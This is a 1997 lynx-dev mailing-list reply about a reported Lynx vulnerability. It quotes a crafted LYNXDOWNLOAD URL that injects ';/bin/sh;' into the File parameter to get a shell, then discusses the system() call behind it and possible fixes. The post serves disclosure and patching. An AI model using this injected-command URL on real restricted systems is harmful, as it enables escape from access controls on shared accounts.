Re: LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd)

[Wayne Buttles]

On Tue, 24 Jun 1997, H E Nelson wrote:

> > subscribed to the raven list :)  So, here it is in case nobody's seen
> > it yet.

I got the original, but thought everyone did.  Should raven just point at
address@hidden ?

> >     URL to open: 
> > LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/null
> >     Enter a filename: /dev/null
> >     File exists. Overwrite? (y/n) y
> > 
> > This then gives a shell on the client machine on which the lynx process is
> > executing.
> 
> On my pubLynx, it does appear that a shell was created.  Not only that, I
> found that by using certain control keys (the terminal was initially locked
> to regular keys), I could create any number of shells after that.

On my pc the terminal is not locked up, my keystrokes are just invisable.
This is a sticky one...LYNXDOWNLOAD does a system() call which purposfully
calls /bin/sh to do its dirty work.  We can easily write in a filter for
future versions and maybe use exec() instead, but for the life of me I
can't think of a fix for old versions.

If the account is stuck in a chroot jail with sh, lynx, cp and nothing
else...can they be dangerous?

Wayne

;
; To UNSUBSCRIBE:  Send a mail message to address@hidden
;                  with "unsubscribe lynx-dev" (without the
;                  quotation marks) on a line by itself.
;